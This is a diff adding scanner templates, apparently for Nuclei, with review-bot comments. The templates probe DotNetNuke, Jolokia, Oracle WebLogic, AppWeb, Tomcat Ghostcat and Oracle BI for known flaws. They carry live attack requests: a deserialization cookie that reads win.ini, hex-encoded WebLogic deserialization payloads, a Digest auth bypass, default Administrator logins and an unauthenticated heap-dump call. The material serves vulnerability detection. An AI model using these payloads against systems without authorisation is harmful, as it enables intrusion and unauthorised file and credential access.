diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml
new file mode 100644
index 0000000000..257292c0b8
--- /dev/null
+++ b/cves/2017/CVE-2017-9822.yaml
@@ -0,0 +1,35 @@
+id: CVE-2017-9822
+
+info:
+ name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE)
+ author: milo2012
+ severity: high
+ description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE)
+ tags: cve,cve2017,dotnetnuke,bypass
+ reference: https://github.com/murataydemir/CVE-2017-9822
+
+requests:
+ - raw:
+ - |
+ GET /__ HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
+ Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+ Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+ Accept-Encoding: gzip, deflate
+ X-Requested-With: XMLHttpRequest
+ Connection: close
+ Cookie: dnn_IsMobile=False; DNNPersonalization=- WriteFileC:\Windows\win.ini
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '[extensions]'
+ - 'for 16-bit app support'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 404
\ No newline at end of file
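Review bot: The `tags` line labels this deserialization RCE check as `bypass`, which misfiles it for anyone filtering scans or triaging findings by tag; `tags: cve,cve2017,dotnetnuke,rce,deserialization` matches what the name and description say. The description's "are affected to deserialization vulnerability" should read `are affected by a deserialization vulnerability`, and the file ends without a trailing newline. The matcher only accepts `win.ini` content returned alongside a 404, so a `#` comment above `matchers` explaining why 404 is the expected status would help the next maintainer judge false negatives.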
diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml
new file mode 100644
index 0000000000..e00ef15315
--- /dev/null
+++ b/cves/2018/CVE-2018-1000130.yaml
@@ -0,0 +1,40 @@
+id: CVE-2018-1000130
+
+info:
+ name: Jolokia Agent Proxy JNDI Code Injection
+ author: milo2012
+ severity: high
+ description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
+ tags: cve,cve2018,jolokia,rce
+
+requests:
+ - raw:
+ - |
+ POST /jolokia/read/getDiagnosticOptions HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
+ Accept-Language: en-GB,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 167
+
+ {
+ "type" : "read",
+ "mbean" : "java.lang:type=Memory",
+ "target" : {
+ "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
+ part: body
+ - type: status
+ status:
+ - 200
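Review bot: The request declares `Content-Type: application/x-www-form-urlencoded` and a fixed `Content-Length: 167` for a JSON body, so a server or intermediary that honours either header strictly may reject or truncate the probe, and the template then silently reports nothing. I would send `Content-Type: application/json` and drop the `Content-Length` line so the length is derived from the body (worth confirming for the raw-request mode used here). The `Accept` header also ends in a truncated `q=0.`. The same three header lines appear in jolokia-heap-info-disclosure.yaml, and oracle-bi-default-credentials.yaml pins `Content-Length: 771` in the same way. `info` has no `reference` entry pointing at the advisory.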
diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml
new file mode 100644
index 0000000000..0421d15888
--- /dev/null
+++ b/cves/2018/CVE-2018-2628.yaml
@@ -0,0 +1,24 @@
+id: CVE-2018-2628
+
+info:
+ name: Oracle WebLogic Server Deserialization RCE
+ author: milo2012
+ severity: high
+ reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628
+ tags: cve,cve2018,oracle,weblogic,network
+
+network:
+ - inputs:
+ - data: "{{hex_decode('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')}}"
+ read: 1024
+ - data: "{{hex_decode('000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e6
16c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078')}}"
+ read: 1024
+ - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}"
+ read: 1024
+ host:
+ - "{{Hostname}}"
+ read-size: 1024
+ matchers:
+ - type: regex
+ regex:
+ - "\\$Proxy[0-9]+"
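Review bot: The three `hex_decode` inputs are opaque blobs with no comment on what each one is or where the bytes came from, which makes the template hard to audit before it is run against production hosts. The first decodes to the plain T3 handshake (`t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n`) and could be written as a readable string the way CVE-2018-2893.yaml does; the other two deserve a one-line `#` comment each, naming the protocol stage and the source of the capture. The second blob still carries what look like the capturing lab's address and hostname (`192.168.1.227`, `WIN-AGDMVQUB1T6`), which that comment should acknowledge. `info` has no `description`, and the same is true of CVE-2018-2893.yaml, CVE-2020-1938.yaml, oracle-bi-default-credentials.yaml and jolokia-heap-info-disclosure.yaml. Since the single `\\$Proxy[0-9]+` regex is the only evidence of a hit, the description should say what that string in the reply indicates.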
diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml
new file mode 100644
index 0000000000..4fc9fa8c42
--- /dev/null
+++ b/cves/2018/CVE-2018-2893.yaml
@@ -0,0 +1,29 @@
+id: CVE-2018-2893
+
+info:
+ name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893)
+ author: milo2012
+ severity: high
+ tags: cve,cve2018,weblogic,network
+ reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL
+
+network:
+ - inputs:
+ - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
+ read: 1024
+ - data: "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"
+ type: hex
+ read: 1024
+ - data: "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"
+ type: hex
+ read: 1024
+ - data: "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"
+ type: hex
+ read: 1024
+ host:
+ - "{{Hostname}}"
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "StreamMessageImpl cannot be cast to weblogic"
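Review bot: `reference` packs two URLs into one comma-separated scalar, so anything that treats the field as a link gets a single invalid URL; a YAML list with one URL per `- ` item keeps both usable. CVE-2018-8715.yaml has the related problem of `reference: |` followed by a `- https://…` line, which is a block string that begins with a dash rather than a list. The handshake on the first input still advertises `PU:t3://us-l-breens:7001`, a hostname that looks inherited from the original proof of concept; a short comment saying it is a fixed placeholder would save reviewers from wondering whether it should be templated.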
diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml
new file mode 100644
index 0000000000..fb2cf93537
--- /dev/null
+++ b/cves/2018/CVE-2018-8715.yaml
@@ -0,0 +1,33 @@
+id: CVE-2018-8715
+
+info:
+ name: AppWeb Authentication Bypass vulnerability
+ author: milo2012
+ severity: high
+ description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
+ tags: cve,cve2018,appweb,auth-bypass
+ reference: |
+ - https://github.com/embedthis/appweb/issues/610
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+ Connection: close
+ Authorization: Digest username=admin
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ' '
+ part: body
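Review bot: As shown, the body matcher is `words: - ' '`, a single space, so together with `status: 200` it fires on essentially any page that answers `/` with content, whether or not authentication was ever required. If markup was lost from that line when the page was rendered, disregard this; otherwise the matcher needs a string specific to an authenticated Appweb response. Even with a better word, a 200 on `/` only demonstrates a bypass when the same path answers 401 without the forged `Authorization` header, so a baseline request ahead of this one would cut false positives. The hard-coded `username=admin` also means hosts whose account has another name are reported clean, which the description should state.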
diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml
new file mode 100644
index 0000000000..14c505aa53
--- /dev/null
+++ b/cves/2020/CVE-2020-1938.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-1938
+
+info:
+ name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability
+ author: milo2012
+ severity: high
+ reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
+ tags: cve,cve2020,apache,tomcat,lfi,network
+
+network:
+ - inputs:
+ - data: "{{hex_decode('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')}}"
+ host:
+ - "{{Hostname}}:8009"
+ read-size: 1024
+ matchers:
+ - type: word
+ words:
+ - "See the NOTICE file distributed with"
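Review bot: `host: "{{Hostname}}:8009"` appends the AJP port to whatever the target string was, so if the input already carries a port (as `{{Hostname}}` may) the address becomes `host:port:8009` and the connection fails with no finding; `"{{Host}}:8009"` avoids that. The lone word matcher keys on Apache licence-header text, and a `#` comment should tie it to the file the request asks for, since the hex payload does not make that visible. Severity is `high` here, which is worth checking against the CVE's published score.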
diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml
new file mode 100644
index 0000000000..1219ef549f
--- /dev/null
+++ b/default-logins/oracle/oracle-bi-default-credentials.yaml
@@ -0,0 +1,42 @@
+id: oracle-business-intelligence-default-credentials
+
+info:
+ name: Oracle Business Intelligence Default Credentials
+ author: milo2012
+ severity: high
+ tags: oracle,dlogin
+
+requests:
+ - raw:
+ - |
+ POST /xmlpserver/services/XMLPService HTTP/1.1
+ Content-Type: text/xml
+ SOAPAction: ""
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Encoding: gzip,deflate
+ Content-Length: 771
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
+ Host: {{Hostname}}
+ Connection: Keep-alive
+
+
+
+
+
+ Administrator
+ Administrator
+ bi
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'createSessionReturn'
+ part: body
diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml
new file mode 100644
index 0000000000..cd7dd6cd13
--- /dev/null
+++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml
@@ -0,0 +1,37 @@
+id: jolokia-heap-info-disclosure
+
+info:
+ name: Jolokia Java Heap Information Disclosure
+ author: milo2012
+ severity: info
+ tags: jolokia,disclosure
+
+requests:
+ - raw:
+ - |
+ POST /jolokia/ HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
+ Accept-Language: en-GB,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 136
+
+ {
+ "type":"EXEC",
+ "mbean":"com.sun.management:type=HotSpotDiagnostic",
+ "operation":"dumpHeap",
+ "arguments":[
+ "/tmp1234/test1.hprof",
+ 0
+ ]
+ }
+
+ matchers:
+ - type: word
+ words:
+ - 'stacktrace":"java.io.IOException: No such file or directory'
+ part: body
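Review bot: This check calls the `dumpHeap` operation for real and relies on `/tmp1234/` not existing; on a host where that directory does exist the scan would write a heap dump to disk. That side effect and assumption belong in an `info.description`, and the path should be one that is far less likely to exist. The matcher string `No such file or directory` is the POSIX error text, so a Windows-hosted JVM would presumably return different wording and be missed. What a match actually proves is that unauthenticated `EXEC` on `HotSpotDiagnostic` is reachable, which is more than the `info` severity and the "Information Disclosure" name suggest.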